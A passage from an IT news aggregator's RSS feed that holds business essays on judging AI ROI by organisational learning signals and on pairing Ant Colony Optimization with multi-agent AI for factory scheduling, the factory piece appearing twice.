<p class="wp-block-paragraph">First, any of these signals can be gamed once it becomes a target. This is <a href="https://en.wikipedia.org/wiki/Goodhart%27s_law">Goodhart’s Law.</a> The review burden can fall because people simply review less. So, pair every efficiency signal with a quality check, such as error rates, rework and downstream complaints.</p>



<p class="wp-block-paragraph">Second, expect the early numbers to look bad. Honest instrumentation usually shows that AI currently costs more per verified outcome than the old process, because the organization is still <a href="https://www.nber.org/papers/w25148">paying its learning costs</a>.</p>



<h2 class="wp-block-heading"><a></a>Final thoughts</h2>



<p class="wp-block-paragraph"><br>I am not saying AI is overhyped, and I am not saying speed, cost and adoption will never matter. Every real gain eventually shows up in those numbers. I am saying they show up last because they are the output of a learning process, not the process itself. Judge AI by them today, and you will make your keep-or-kill decisions years before the evidence arrives.</p>



<p class="wp-block-paragraph">If I could track only one thing, it would be the delegation boundary. It compresses everything else into a single observable fact. The boundary only moves when context has been encoded, standards have been made explicit, corrections have been institutionalized and trust has been earned through verified results. It is the output yardstick of the entire learning system. If this has not moved in a year, no other number on the dashboard means anything, however green it looks.</p>



<p class="wp-block-paragraph">Measure the learning, and the returns will follow. Measure only the returns, and you may kill the learning that produces them.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Algorithms aren’t enough: Why factories need an AI reasoning layer]]></title>
<description><![CDATA[The scheduling fallacy and the shift to autonomy



Walk onto almost any manufacturing shop floor, and you will witness the same systemic vulnerability: a brilliantly engineered, multi-million-dollar Advanced Planning and Scheduling (APS) system rendered completely useless by a single delayed del...]]></description>
<link>https://tsecurity.de/de/3707683/it-security-nachrichten/algorithms-arent-enough-why-factories-need-an-ai-reasoning-layer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707683/it-security-nachrichten/algorithms-arent-enough-why-factories-need-an-ai-reasoning-layer/</guid>
<pubDate>Thu, 06 Aug 2026 12:51:45 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">The scheduling fallacy and the shift to autonomy</h2>



<p class="wp-block-paragraph">Walk onto almost any manufacturing shop floor, and you will witness the same systemic vulnerability: a brilliantly engineered, multi-million-dollar Advanced Planning and Scheduling (APS) system rendered completely useless by a single delayed delivery truck, an unexpected machine drift or a sudden workforce shortage. Industrial operations do not happen in a sterile room; the moment a perfect plan hits the messy reality of the physical shop floor, real-world variables inevitably shatter it.</p>



<p class="wp-block-paragraph">This is the scenario (or challenge) that I have been navigating over the past few months and is likely to keep me occupied for the remainder of the year. I began this project believing the scheduling engine was the problem. After months of experimentation, including trying to make LLMs perform optimization, I realized I was solving the wrong problem. The realization that dawned on me was that it wasn’t about a better algorithm; it was about separating mathematical optimization from operational reasoning.</p>



<p class="wp-block-paragraph">According to the <a href="https://www.bassetti-group.com/en/manufacturing-gartner-2026-ai/">2026 Gartner Manufacturing Predicts report</a>, factory orchestration is moving rapidly toward a “double helix” model where software-defined enterprise data intricately intertwines with autonomous production orchestration. Gartner also projects that 40% of enterprise applications will feature integrated, task-specific AI agents by the end of 2026 — a massive leap from less than 5% in 2025. For technology leaders, the mandate is clear.</p>



<h2 class="wp-block-heading">Deconstructing the “reasoning layer”</h2>



<p class="wp-block-paragraph">Let’s first demystify what a “Reasoning Layer” is and what it is not. It is not a Generative AI nor is it a glorified Robotic Process Automation (RPA) script executing static, hardcoded logic. Instead, the Reasoning Layer is a cognitive overlay powered by foundation models. These models have been fine-tuned on operational ontologies, enterprise supply chain strategies and real-time shop-floor data streams. Pretty much everything that happens in your organization and, in many cases, outside as well, as some decisions are impacted by the prevailing external situation.</p>



<p class="wp-block-paragraph">A reasoning layer continuously answers a complex question: Given this specific disruption, what is the optimal business choice right now?</p>



<h2 class="wp-block-heading">The dual-engine architecture: Math meets cognition</h2>



<p class="wp-block-paragraph">A common pitfall has been to expect an LLM to handle both. That was the blunder I committed was to assume that a sufficiently trained LLM can get the job done.</p>



<p class="wp-block-paragraph">The true breakthrough in designing a production-grade scheduling application lies in pairing semantic intelligence with raw mathematical muscle.</p>



<p class="wp-block-paragraph">To solve this, what I discovered was that you need to split it into two layers. A number-crunching mathematical layer and a qualitative layer. Both working in sync.  </p>



<ol start="1" class="wp-block-list">
<li><strong>The quantitative engine:</strong> Global pathfinding, sequence optimization and multi-plant capacity balancing are treated as a highly complex routing problem. Ant Colony Optimization (ACO) algorithm, for example, excels here. It can navigate massive combinatorial data spaces to find optimal/near-optimal scheduling sequences across interdependent lines. A word of caution though: This requires good quality data and lots of it.</li>



<li><strong>The qualitative brain (agentic AI):</strong> The AI agent serves as the dynamic coordinator. It monitors the operational environment for live telemetry anomalies (such as machine cycle-time drifts or supply chain delays). When an anomaly occurs, the agent evaluates the business impact. Determines whether a re-optimization is required and crucially rewrites the constraints and boundary conditions before triggering the ACO engine.</li>
</ol>



<p class="wp-block-paragraph">By using the Agentic Layer to bound the mathematical problem, the system avoids the fatal flaw of traditional advanced planning tools: completely rewriting a global schedule over a minor local exception.</p>



<h2 class="wp-block-heading">The multi-plant orchestration paradox</h2>



<p class="wp-block-paragraph">When a manufacturing organization expands from a single facility to a distributed, multi-plant network, operational complexity does not scale linearly — it scales exponentially. In theory, a multi-plant footprint should provide an enterprise with built-in resilience, giving leadership the flexibility to shift production loads when disruptions strike. Most manufacturing organizations suffer from the multi-plant orchestration paradox: they possess massive regional capacity but are structurally blind to how to leverage it dynamically.</p>



<p class="wp-block-paragraph">The root cause of this paradox is the historical legacy corporate silo. If a plant in Chennai faces a sudden logistics bottleneck or a critical machine breakdown, its local team scrambles in isolation. Meanwhile, a sister plant in Pune operates completely unaware that it possesses the excess capacity, specific tooling or material buffers required to absorb the overflow.</p>



<p class="wp-block-paragraph">By the time information filters up to corporate logistics and decisions are taken, you would have lost precious capacity and time.</p>



<h2 class="wp-block-heading">Enter MAGS: The rise of agent-to-agent collaboration</h2>



<p class="wp-block-paragraph">To shatter these corporate silos, the reasoning layer must expand past local optimizations and facilitate cross-facility orchestration. This shift is driven by a distinct architectural evolution: Multi-agent generative systems (MAGS). <a href="https://www.gartner.com/en/articles/multiagent-systems">Gartner highlights</a> the rapid acceleration of this trend, predicting that by 2027, one-third of all agentic AI implementations will focus heavily on autonomous agent-to-agent collaboration.</p>



<p class="wp-block-paragraph">In a MAGS framework, the scheduling agents of individual plants do not operate in a vacuum. Instead, they form an interconnected, distributed network capable of autonomous negotiation. The architectural flow of this cross-facility negotiation occurs across three distinct phases:</p>



<ul class="wp-block-list">
<li><strong>Perception:</strong> Local plant agents continuously ingest live IIoT telemetry, tracking real-time machine interdependencies, resource pooling variances and material transit times across physical transport lanes.</li>



<li><strong>Interpretation:</strong> When an anomaly occurs, the local agent instantly evaluates the disruption against localized business constraints.</li>



<li><strong>Negotiation:</strong> Rather than escalating every minor bottleneck to a human director, Plant A’s scheduling agent connects directly to Plant B’s agent over the secure network. The agents cross-negotiate load-balancing options, evaluate transportation lead times and run localized optimization calculations in parallel.</li>
</ul>



<p class="wp-block-paragraph">Instead of forcing supply chain teams to manually bridge data gaps during a crisis, the system bypasses legacy functional silos. It presents the COO’s operations team with a pre-validated, end-to-end scheduling solution.</p>



<h2 class="wp-block-heading">Real-world applications: Grounding autonomy in industrial reality</h2>



<p class="wp-block-paragraph">To understand how this functions in the real world, we must look beyond theoretical multi-agent frameworks and examine how this architecture operates within live factories. The following two case studies—drawn from highly documented, peer-reviewed industrial implementations — demonstrate how multi-agent generative systems (MAGS) actively protect margins and timelines when unexpected disruptions strike.</p>



<h3 class="wp-block-heading">Case study 1: The discrete architecture (The Festo cyber-physical agent framework)</h3>



<ul class="wp-block-list">
<li><strong>The context:</strong> This architecture is modeled after the landmark decentralized orchestration frameworks deployed at Festo’s Scharnhausen Technology Plant. Instead of relying on a centralized ERP/MES brain to dictate every move, the facility utilizes cyber-physical systems (CPS) where the physical components and machines operate as an interconnected multi-agent system (MAS).</li>



<li><strong>The disruption:</strong> During a high-volume discrete run of automation components, a critical machining center suffering an unexpected tooling failure, in a traditional centralized setup, would have triggered a cascade of line stoppages.</li>



<li><strong>The intervention:</strong> The affected machine’s resource agent instantly broadcasts its downtime status across the network. The task agents ingest the anomaly and independently query neighboring machining cells. The setup utilizes an underlying ACO routing routine to calculate the most efficient physical path through alternative, under-utilized cells. The Task Agents actively barter for open capacity with these alternative resource agents, dynamically adjusting their own operational sequences.</li>
</ul>



<h3 class="wp-block-heading">Case study 2: The process pivot (The TU Dresden battery manufacturing framework)</h3>



<ul class="wp-block-list">
<li><strong>The context:</strong> This case is drawn directly from a multi-layer agent-based framework engineered for a European lead-acid battery manufacturer in coordination with researchers at TU Dresden. The environment features 31 highly energy-intensive heat-treatment and curing chambers, where localized utility tariff volatility drastically impacts production margins. Continuous chemical process lines cannot simply be shut down without massive material waste and lengthy restart sequences.</li>



<li><strong>The disruption:</strong> A sudden, localized weather event triggers an unpredicted spike in peak-load electricity pricing, threatening to entirely erase the profit margin on a high-volume production run.</li>



<li><strong>The intervention:</strong> To solve this, the plant utilized a multi-layer agent-based framework. An energy-monitoring agent tracking live utility tariff feeds communicated the financial threat directly to the production scheduling agent. Instead of a crude emergency halt, the reasoning layer queried the facility’s computerized maintenance management system (CMMS). The agentic layer identified a mandatory 4-hour preventative maintenance window scheduled for three days later. The agent made an executive operational decision: it pulled that maintenance window forward to occur <em>during</em> the exact hours of peak utility pricing, converting an expensive tariff penalty into required downtime. Simultaneously, lower-level agents representing the individual curing chambers and material pallets recalculated local constraints, instructing the optimization engine to compress and accelerate subsequent production batches during the cheaper, off-peak night shifts.</li>
</ul>



<h3 class="wp-block-heading">The business outcome</h3>



<p class="wp-block-paragraph">In both cases, the agents optimized an operational pivot, and optimally utilised production capacity in the former and saved precious cash in the latter.</p>



<h2 class="wp-block-heading">Governance, trust and the “human-in-the-loop” guardrails</h2>



<p class="wp-block-paragraph">All that seems great and seems like science fiction; it inevitably raises a critical, polarizing question for the C-suite: If the algorithms are making multi-thousand-dollar operational choices in real time, how do we maintain control?</p>



<p class="wp-block-paragraph">The solution to this executive anxiety is a framework defined as “autonomy within boundaries,” executed through policy-as-code. Under this model, operational leaders stop managing the volatility of daily schedules. Instead, they focus on creating and managing policy boundaries within which the agents are permitted to negotiate and self-heal.</p>



<p class="wp-block-paragraph">This splits operational exceptions into 2 zones:</p>



<ul class="wp-block-list">
<li><strong>Autonomous execution zone:</strong> The multi-agent system has full authority to re-sequence lines, re-route components or shift maintenance windows autonomously, provided the financial &amp; operational impact is under a predefined limit.  </li>



<li><strong>Expert advisory zone:</strong> The moment a proposed optimization breaches either of these metrics, the agent pushes it to an executive dashboard for immediate human intervention, validation and approval.</li>
</ul>



<p class="wp-block-paragraph">This dual-layer approach introduces a reliable operational framework to industrial manufacturing: leadership manages strategic intent, while tactical units manage real-time execution.</p>



<p class="wp-block-paragraph">By establishing clear thresholds, the fear of an algorithmic “runaway train” is entirely mitigated. However, deploying a complete multi-agent governance framework across an entire enterprise footprint cannot happen overnight.</p>



<p class="wp-block-paragraph">To move this from my serendipitous but compelling discovery to a live, risk-mitigated environment, I need a highly controlled, phased deployment strategy, an actionable roadmap to pilot, test and scale the reasoning layer without disrupting current production baselines.</p>



<p class="wp-block-paragraph">We often say Industry 4.0 connected machines. I believe Industry 5.0 will connect decisions. The factories that succeed will not simply automate workflows; they will build systems capable of reasoning within clearly defined operational boundaries.</p>



<p class="wp-block-paragraph">I am therefore not writing a conclusion here. I would probably be back in a few months writing about the outcome of this exercise. Somehow deep-down I suspect it would be less oriented to technology but how the change management progressed. I have a strong feeling that “…operational leaders stop managing the volatility of daily schedules. Instead, they focus on creating and managing policy boundaries …” would be the toughest part of this change.   </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Algorithms aren’t enough: Why factories need an AI reasoning layer]]></title>
<description><![CDATA[The scheduling fallacy and the shift to autonomy



Walk onto almost any manufacturing shop floor, and you will witness the same systemic vulnerability: a brilliantly engineered, multi-million-dollar Advanced Planning and Scheduling (APS) system rendered completely useless by a single delayed del...]]></description>
<link>https://tsecurity.de/de/3707630/it-nachrichten/algorithms-arent-enough-why-factories-need-an-ai-reasoning-layer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707630/it-nachrichten/algorithms-arent-enough-why-factories-need-an-ai-reasoning-layer/</guid>
<pubDate>Thu, 06 Aug 2026 12:50:21 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">The scheduling fallacy and the shift to autonomy</h2>



<p class="wp-block-paragraph">Walk onto almost any manufacturing shop floor, and you will witness the same systemic vulnerability: a brilliantly engineered, multi-million-dollar Advanced Planning and Scheduling (APS) system rendered completely useless by a single delayed delivery truck, an unexpected machine drift or a sudden workforce shortage. Industrial operations do not happen in a sterile room; the moment a perfect plan hits the messy reality of the physical shop floor, real-world variables inevitably shatter it.</p>



<p class="wp-block-paragraph">This is the scenario (or challenge) that I have been navigating over the past few months and is likely to keep me occupied for the remainder of the year. I began this project believing the scheduling engine was the problem. After months of experimentation, including trying to make LLMs perform optimization, I realized I was solving the wrong problem. The realization that dawned on me was that it wasn’t about a better algorithm; it was about separating mathematical optimization from operational reasoning.</p>



<p class="wp-block-paragraph">According to the <a href="https://www.bassetti-group.com/en/manufacturing-gartner-2026-ai/">2026 Gartner Manufacturing Predicts report</a>, factory orchestration is moving rapidly toward a “double helix” model where software-defined enterprise data intricately intertwines with autonomous production orchestration. Gartner also projects that 40% of enterprise applications will feature integrated, task-specific AI agents by the end of 2026 — a massive leap from less than 5% in 2025. For technology leaders, the mandate is clear.</p>



<h2 class="wp-block-heading">Deconstructing the “reasoning layer”</h2>



<p class="wp-block-paragraph">Let’s first demystify what a “Reasoning Layer” is and what it is not. It is not a Generative AI nor is it a glorified Robotic Process Automation (RPA) script executing static, hardcoded logic. Instead, the Reasoning Layer is a cognitive overlay powered by foundation models. These models have been fine-tuned on operational ontologies, enterprise supply chain strategies and real-time shop-floor data streams. Pretty much everything that happens in your organization and, in many cases, outside as well, as some decisions are impacted by the prevailing external situation.</p>



<p class="wp-block-paragraph">A reasoning layer continuously answers a complex question: Given this specific disruption, what is the optimal business choice right now?</p>



<h2 class="wp-block-heading">The dual-engine architecture: Math meets cognition</h2>



<p class="wp-block-paragraph">A common pitfall has been to expect an LLM to handle both. That was the blunder I committed was to assume that a sufficiently trained LLM can get the job done.</p>



<p class="wp-block-paragraph">The true breakthrough in designing a production-grade scheduling application lies in pairing semantic intelligence with raw mathematical muscle.</p>



<p class="wp-block-paragraph">To solve this, what I discovered was that you need to split it into two layers. A number-crunching mathematical layer and a qualitative layer. Both working in sync.  </p>



<ol start="1" class="wp-block-list">
<li><strong>The quantitative engine:</strong> Global pathfinding, sequence optimization and multi-plant capacity balancing are treated as a highly complex routing problem. Ant Colony Optimization (ACO) algorithm, for example, excels here. It can navigate massive combinatorial data spaces to find optimal/near-optimal scheduling sequences across interdependent lines. A word of caution though: This requires good quality data and lots of it.</li>



<li><strong>The qualitative brain (agentic AI):</strong> The AI agent serves as the dynamic coordinator. It monitors the operational environment for live telemetry anomalies (such as machine cycle-time drifts or supply chain delays). When an anomaly occurs, the agent evaluates the business impact. Determines whether a re-optimization is required and crucially rewrites the constraints and boundary conditions before triggering the ACO engine.</li>
</ol>



<p class="wp-block-paragraph">By using the Agentic Layer to bound the mathematical problem, the system avoids the fatal flaw of traditional advanced planning tools: completely rewriting a global schedule over a minor local exception.</p>



<h2 class="wp-block-heading">The multi-plant orchestration paradox</h2>



<p class="wp-block-paragraph">When a manufacturing organization expands from a single facility to a distributed, multi-plant network, operational complexity does not scale linearly — it scales exponentially. In theory, a multi-plant footprint should provide an enterprise with built-in resilience, giving leadership the flexibility to shift production loads when disruptions strike. Most manufacturing organizations suffer from the multi-plant orchestration paradox: they possess massive regional capacity but are structurally blind to how to leverage it dynamically.</p>



<p class="wp-block-paragraph">The root cause of this paradox is the historical legacy corporate silo. If a plant in Chennai faces a sudden logistics bottleneck or a critical machine breakdown, its local team scrambles in isolation. Meanwhile, a sister plant in Pune operates completely unaware that it possesses the excess capacity, specific tooling or material buffers required to absorb the overflow.</p>



<p class="wp-block-paragraph">By the time information filters up to corporate logistics and decisions are taken, you would have lost precious capacity and time.</p>



<h2 class="wp-block-heading">Enter MAGS: The rise of agent-to-agent collaboration</h2>



<p class="wp-block-paragraph">To shatter these corporate silos, the reasoning layer must expand past local optimizations and facilitate cross-facility orchestration. This shift is driven by a distinct architectural evolution: Multi-agent generative systems (MAGS). <a href="https://www.gartner.com/en/articles/multiagent-systems">Gartner highlights</a> the rapid acceleration of this trend, predicting that by 2027, one-third of all agentic AI implementations will focus heavily on autonomous agent-to-agent collaboration.</p>



<p class="wp-block-paragraph">In a MAGS framework, the scheduling agents of individual plants do not operate in a vacuum. Instead, they form an interconnected, distributed network capable of autonomous negotiation. The architectural flow of this cross-facility negotiation occurs across three distinct phases:</p>



<ul class="wp-block-list">
<li><strong>Perception:</strong> Local plant agents continuously ingest live IIoT telemetry, tracking real-time machine interdependencies, resource pooling variances and material transit times across physical transport lanes.</li>



<li><strong>Interpretation:</strong> When an anomaly occurs, the local agent instantly evaluates the disruption against localized business constraints.</li>



<li><strong>Negotiation:</strong> Rather than escalating every minor bottleneck to a human director, Plant A’s scheduling agent connects directly to Plant B’s agent over the secure network. The agents cross-negotiate load-balancing options, evaluate transportation lead times and run localized optimization calculations in parallel.</li>
</ul>



<p class="wp-block-paragraph">Instead of forcing supply chain teams to manually bridge data gaps during a crisis, the system bypasses legacy functional silos. It presents the COO’s operations team with a pre-validated, end-to-end scheduling solution.</p>



<h2 class="wp-block-heading">Real-world applications: Grounding autonomy in industrial reality</h2>



<p class="wp-block-paragraph">To understand how this functions in the real world, we must look beyond theoretical multi-agent frameworks and examine how this architecture operates within live factories. The following two case studies—drawn from highly documented, peer-reviewed industrial implementations — demonstrate how multi-agent generative systems (MAGS) actively protect margins and timelines when unexpected disruptions strike.</p>



<h3 class="wp-block-heading">Case study 1: The discrete architecture (The Festo cyber-physical agent framework)</h3>



<ul class="wp-block-list">
<li><strong>The context:</strong> This architecture is modeled after the landmark decentralized orchestration frameworks deployed at Festo’s Scharnhausen Technology Plant. Instead of relying on a centralized ERP/MES brain to dictate every move, the facility utilizes cyber-physical systems (CPS) where the physical components and machines operate as an interconnected multi-agent system (MAS).</li>



<li><strong>The disruption:</strong> During a high-volume discrete run of automation components, a critical machining center suffering an unexpected tooling failure, in a traditional centralized setup, would have triggered a cascade of line stoppages.</li>



<li><strong>The intervention:</strong> The affected machine’s resource agent instantly broadcasts its downtime status across the network. The task agents ingest the anomaly and independently query neighboring machining cells. The setup utilizes an underlying ACO routing routine to calculate the most efficient physical path through alternative, under-utilized cells. The Task Agents actively barter for open capacity with these alternative resource agents, dynamically adjusting their own operational sequences.</li>
</ul>



<h3 class="wp-block-heading">Case study 2: The process pivot (The TU Dresden battery manufacturing framework)</h3>



<ul class="wp-block-list">
<li><strong>The context:</strong> This case is drawn directly from a multi-layer agent-based framework engineered for a European lead-acid battery manufacturer in coordination with researchers at TU Dresden. The environment features 31 highly energy-intensive heat-treatment and curing chambers, where localized utility tariff volatility drastically impacts production margins. Continuous chemical process lines cannot simply be shut down without massive material waste and lengthy restart sequences.</li>



<li><strong>The disruption:</strong> A sudden, localized weather event triggers an unpredicted spike in peak-load electricity pricing, threatening to entirely erase the profit margin on a high-volume production run.</li>



<li><strong>The intervention:</strong> To solve this, the plant utilized a multi-layer agent-based framework. An energy-monitoring agent tracking live utility tariff feeds communicated the financial threat directly to the production scheduling agent. Instead of a crude emergency halt, the reasoning layer queried the facility’s computerized maintenance management system (CMMS). The agentic layer identified a mandatory 4-hour preventative maintenance window scheduled for three days later. The agent made an executive operational decision: it pulled that maintenance window forward to occur <em>during</em> the exact hours of peak utility pricing, converting an expensive tariff penalty into required downtime. Simultaneously, lower-level agents representing the individual curing chambers and material pallets recalculated local constraints, instructing the optimization engine to compress and accelerate subsequent production batches during the cheaper, off-peak night shifts.</li>
</ul>



<h3 class="wp-block-heading">The business outcome</h3>



<p class="wp-block-paragraph">In both cases, the agents optimized an operational pivot, and optimally utilised production capacity in the former and saved precious cash in the latter.</p>



<h2 class="wp-block-heading">Governance, trust and the “human-in-the-loop” guardrails</h2>



<p class="wp-block-paragraph">All that seems great and seems like science fiction; it inevitably raises a critical, polarizing question for the C-suite: If the algorithms are making multi-thousand-dollar operational choices in real time, how do we maintain control?</p>



<p class="wp-block-paragraph">The solution to this executive anxiety is a framework defined as “autonomy within boundaries,” executed through policy-as-code. Under this model, operational leaders stop managing the volatility of daily schedules. Instead, they focus on creating and managing policy boundaries within which the agents are permitted to negotiate and self-heal.</p>



<p class="wp-block-paragraph">This splits operational exceptions into 2 zones:</p>



<ul class="wp-block-list">
<li><strong>Autonomous execution zone:</strong> The multi-agent system has full authority to re-sequence lines, re-route components or shift maintenance windows autonomously, provided the financial &amp; operational impact is under a predefined limit.  </li>



<li><strong>Expert advisory zone:</strong> The moment a proposed optimization breaches either of these metrics, the agent pushes it to an executive dashboard for immediate human intervention, validation and approval.</li>
</ul>



<p class="wp-block-paragraph">This dual-layer approach introduces a reliable operational framework to industrial manufacturing: leadership manages strategic intent, while tactical units manage real-time execution.</p>



<p class="wp-block-paragraph">By establishing clear thresholds, the fear of an algorithmic “runaway train” is entirely mitigated. However, deploying a complete multi-agent governance framework across an entire enterprise footprint cannot happen overnight.</p>



<p class="wp-block-paragraph">To move this from my serendipitous but compelling discovery to a live, risk-mitigated environment, I need a highly controlled, phased deployment strategy, an actionable roadmap to pilot, test and scale the reasoning layer without disrupting current production baselines.</p>



<p class="wp-block-paragraph">We often say Industry 4.0 connected machines. I believe Industry 5.0 will connect decisions. The factories that succeed will not simply automate workflows; they will build systems capable of reasoning within clearly defined operational boundaries.</p>



<p class="wp-block-paragraph">I am therefore not writing a conclusion here. I would probably be back in a few months writing about the outcome of this exercise. Somehow deep-down I suspect it would be less oriented to technology but how the change management progressed. I have a strong feeling that “…operational leaders stop managing the volatility of daily schedules. Instead, they focus on creating and managing policy boundaries …” would be the toughest part of this change.   </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI ROI metrics are measuring the wrong thing]]></title>
<description><![CDATA[The loudest conversation in business right now is about how much value AI actually generates. Over the last year, AI has moved from a side experiment to a strategic priority. It has its own budget line, its own place on the board’s agenda and its own pressure to show results. Every leader is aski...]]></description>
<link>https://tsecurity.de/de/3707632/it-nachrichten/why-ai-roi-metrics-are-measuring-the-wrong-thing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3707632/it-nachrichten/why-ai-roi-metrics-are-measuring-the-wrong-thing/</guid>
<pubDate>Thu, 06 Aug 2026 12:50:21 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The loudest conversation in business right now is about how much value AI actually generates. Over the last year, AI has moved from a side experiment to a strategic priority. It has its own budget line, its own place on the board’s agenda and its own pressure to show results. Every leader is asking a version of the same question: What are we getting back?</p>



<p class="wp-block-paragraph">To answer it, most reach for the three measures they have always trusted to judge a technology:</p>



<ul class="wp-block-list">
<li>How much faster are we now?</li>



<li>How much money has it saved us?</li>



<li>How many of our people are using it?</li>
</ul>



<p class="wp-block-paragraph">Speed, cost and adoption were the right yardsticks for every major technology of the past two decades. They worked because the capability of traditional software was fixed and known on the day you deployed it. The tool did a defined job. Its value had a ceiling you could see, and each metric measured your progress toward that ceiling. Cost reduction told you how much you could save. Adoption told you how much of the capability you had rolled out. Speed told you how much of the promised acceleration was reaching the output.</p>



<p class="wp-block-paragraph">In every case, the tool was a constant, and the metric measured how fully the organization had absorbed that constant.</p>



<p class="wp-block-paragraph">These metrics are not working for AI. The reason starts with how AI entered our organizations.</p>



<p class="wp-block-paragraph">Every technology before this was chosen somewhere above us, deployed to us and trained into us. By the time it arrived on our desks, someone had already decided what it was for. AI came the other way. It landed as a personal productivity tool. You opened a tab, typed a question and something useful came back. Nobody defined its capability in advance, because its capability is not fixed. What it produces depends on who is using it and how well. Metrics built for fixed capabilities have nothing stable to measure, and here is what happens when you apply them anyway.</p>



<h2 class="wp-block-heading"><a></a>Why speed, cost and adoption fail as AI evaluation metrics</h2>



<p class="wp-block-paragraph">Let’s start with speed. Task speed and business speed are different quantities, and AI only touches the former. Suppose a report that took eight hours now takes two. Your dashboard shows a 75% improvement. But the report still waits three days for review and a week for approval before anyone acts on it. The organization sees dramatic task-level gains but no movement in business results and concludes AI failed. The problem is the metric measuring a layer that was never the bottleneck.</p>



<p class="wp-block-paragraph">Speed creates a second problem, and it is worse. Getting good output from AI requires checking it, correcting it and feeding those corrections back into how the tool is used. That work is slow. On any speed metric, it looks like inefficiency. So, people under speed pressure skip it. They accept output uncritically and produce more volume with less scrutiny.</p>



<p class="wp-block-paragraph">Cost reduction has an arithmetic problem. If you frame AI as a way to reduce what you currently spend, your maximum possible win is your current spend. If your content team costs a million dollars, the best case in a cost frame is saving a million dollars. Every general-purpose technology has followed the same sequence:<a href="https://www.mckinsey.com/capabilities/strategy-and-corporate-finance/our-insights/where-ai-will-create-value-and-where-it-wont"> Efficiency gains came first, and the larger value came later,</a> from work that did not exist before.</p>



<p class="wp-block-paragraph">For AI, that means the analysis nobody had time for, the personalization no team could staff, the experiments too expensive to justify. A cost frame makes all of that invisible because new work doesn’t reduce anything. There is no column on the dashboard for things you couldn’t do last year.</p>



<p class="wp-block-paragraph">Cost framing also works against its own inputs. AI improves through use by knowledgeable people. It needs their corrections, their context and their judgment about what good output looks like. When AI’s success is measured in headcount avoided, those people understand exactly what they are being asked to build: Their own replacement. They respond rationally. They use the tools shallowly and keep their expertise to themselves. The metric announces an intent, and the intent destroys the participation the technology depends on.</p>



<p class="wp-block-paragraph">Adoption looks like the safest of the three. The problem is that adoption measures usage, and usage is not a value.<a href="https://www.nber.org/papers/w34836"> </a>Researchers at several central banks recently <a href="https://www.nber.org/papers/w34836">asked thousands of senior executives about this</a> and heard the same two things from most of them: Yes, we use AI across the business, and no, it has not changed our results yet.</p>



<p class="wp-block-paragraph">A thousand employees asking AI to shorten their emails will produce a spectacular adoption number and almost nothing else. Fifty employees using AI on judgment-heavy work, feeding it real context and checking its output against real standards, will barely register on the dashboard and generate most of the actual return. Adoption metrics cannot tell these two groups apart. Worse, they reward the shallow pattern. Shallow use is easy to spread, and deep use is hard, so an organization managed on adoption drifts toward the use that is easiest to count.</p>



<h2 class="wp-block-heading">6 signals that track the real value</h2>



<p class="wp-block-paragraph">A few months ago, I realized the ROI question was aimed at the wrong object. Every company I compete with has access to the same models I do, at the same price. Whatever value comes from the model itself, my competitors receive too, so it cancels out any comparison between us. It cannot be an advantage, and it is not an interesting thing to measure. The only variable left is us. The standards, the context and the judgment we build around the model, because none of that arrives with the subscription and none of it can be bought. So, when I evaluate AI, I am evaluating my own organization and how quickly it turns a commodity everyone has into a capability only we have. The six signals below all measure that second thing.</p>



<h3 class="wp-block-heading">1. Review burden is falling on the same class of work</h3>



<p class="wp-block-paragraph">Take any recurring task the organization runs through AI: Monthly reports, vendor evaluations, code review. Track how much human checking each unit of output needs, quarter over quarter. If a task needed a full senior review in January and needed a spot check in June, something real happened. The organization encoded its quality standards, improved its inputs and learned where the tool fails. If the review burden is flat, the organization is consuming AI, not compounding on it, no matter what the adoption dashboard says.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Pick five recurring workflows, log review hours per output and plot the trend. The trend is the signal. The absolute number matters far less.</li>
</ul>



<h3 class="wp-block-heading">2. Corrections become shared fixes</h3>



<p class="wp-block-paragraph">When someone discovers that the AI gets something wrong, how long does it take for that discovery to become a shared fix? In a healthy system, one person’s correction becomes an updated prompt, a revised guideline or a documented example of good versus bad within days. Nobody else has to rediscover the same failure. In an unhealthy system, every employee privately learns the same lessons. The knowledge lives in individual chat histories, and it leaves with each departure.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Sample recent corrections and trace them. Did they land anywhere reusable? How long did it take? An organization that cannot answer these questions at all has its answer.</li>
</ul>



<h3 class="wp-block-heading">3. The team does work that it could not do before</h3>



<p class="wp-block-paragraph">The largest returns from any general-purpose technology come from previously impossible work, not from old work done faster. So, look at the work itself. Is the organization doing the same portfolio of tasks faster, or is the portfolio expanding?</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Once a year, list what the team produces now that it did not and could not produce before. If the list is empty after a year of heavy AI use, the organization has been optimizing instead of expanding, and it is capturing the smallest slice of the available value.</li>
</ul>



<h3 class="wp-block-heading">4. The delegation boundary is moving</h3>



<p class="wp-block-paragraph">Every organization has an implicit line: Work AI does alone, work AI does with human review, work humans do entirely. Watch whether that line moves. Work that needed full human ownership last year and needs only oversight now is direct evidence of accumulated capability, clearer standards and earned trust. A frozen boundary means frozen capability.</p>



<ul class="wp-block-list">
<li><strong>How to measure it:</strong> Make the implicit map explicit. Build a simple inventory of task types and their current delegation level, then re-score it quarterly. The change is the signal. It is also one of the few AI metrics a board can grasp intuitively: This category moved from full review to spot check, and here is what we built to make that safe.</li>
</ul>



<h3 class="wp-block-heading">5. Cost per verified outcome is falling</h3>



